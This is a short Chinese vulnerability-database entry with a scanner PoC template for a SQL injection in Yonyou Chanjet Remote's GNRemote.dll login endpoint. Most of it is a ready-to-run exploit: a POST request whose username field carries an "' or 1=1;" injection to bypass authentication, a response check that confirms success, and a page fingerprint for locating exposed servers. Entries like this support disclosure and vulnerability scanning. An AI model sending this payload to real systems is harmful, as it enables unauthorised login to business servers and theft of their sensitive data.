yonyou-chanjet-gnremote-sql-inject: 用友 畅捷通远程通 GNRemote.dll SQL注入漏洞

日期: 2025-09-01 | 影响软件: 用友畅捷通远程通yonyou chanjet gnremote | POC: 已公开

漏洞描述

用友 畅捷通远程通 GNRemote.dll SQL注入漏洞,攻击者通过SQL注入可以获取服务器敏感信息或者使用万能密码登录设备 body="远程通CHANJET_Remote"

PoC代码[已公开]

id: yonyou-chanjet-gnremote-sql-inject

info:
  name: 用友 畅捷通远程通 GNRemote.dll SQL注入漏洞
  author: zan8in
  severity: high
  description: |
    用友 畅捷通远程通 GNRemote.dll SQL注入漏洞,攻击者通过SQL注入可以获取服务器敏感信息或者使用万能密码登录设备
    body="远程通CHANJET_Remote"
  reference:
    - http://wiki.peiqi.tech/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html

rules:
  r0:
    request:
      method: POST
      path: /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl
      body: |
        username=%22'%20or%201%3d1%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1
    expression: response.status == 200 && '"RetCode":(\\s*?)0'.bmatches(response.body)
expression: r0()

相关漏洞推荐